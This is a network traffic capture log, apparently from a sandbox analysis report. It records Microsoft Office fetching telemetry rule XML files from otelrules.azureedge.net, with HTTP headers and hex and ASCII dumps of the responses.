                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            103192.168.2.54988913.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:40 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:41 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1389
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                            x-ms-request-id: 8f98044c-301e-006e-14bd-2cf018000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133941Z-16547b76f7f7scqbhC1DFW0m5w00000006e000000000fzt1
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            104192.168.2.54988713.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:40 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:41 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                            x-ms-request-id: 43524f19-601e-003e-07d2-2c3248000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133941Z-16547b76f7f2g4rlhC1DFWnx8800000006m000000000at5m
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            105192.168.2.54989013.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:41 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1352
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                            x-ms-request-id: 96da997d-001e-0028-355d-2cc49f000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133941Z-16547b76f7fxsvjdhC1DFWprrs00000006m000000000bm1t
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            106192.168.2.54989413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:41 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                            x-ms-request-id: 3018d77d-101e-008d-49d2-2c92e5000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133941Z-16547b76f7frbg6bhC1DFWr54000000006rg00000000020e
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            107192.168.2.54989513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:41 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                            x-ms-request-id: bcab188a-c01e-0014-325f-2ea6a3000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133941Z-17df447cdb54ntx4hC1DFW2k4000000002t000000000cmqs
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            108192.168.2.54989613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:41 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                            x-ms-request-id: ddaecdfb-101e-0079-21d2-2c5913000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133941Z-16547b76f7f775p5hC1DFWzdvn00000006t0000000002amd
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            109192.168.2.54989813.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:42 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                            x-ms-request-id: 98909b4d-d01e-002b-39d2-2c25fb000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133942Z-16547b76f7f2g4rlhC1DFWnx8800000006qg000000002ty1
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            110192.168.2.56196413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:42 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                            x-ms-request-id: c82eced8-401e-008c-2858-2e86c2000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133942Z-17df447cdb5lrwcchC1DFWphes00000002w000000000athn
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            111192.168.2.56196613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:42 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                            x-ms-request-id: 4630a231-e01e-0020-14ff-2bde90000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133942Z-16547b76f7fkj7j4hC1DFW0a9g00000006ng00000000cc1g
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
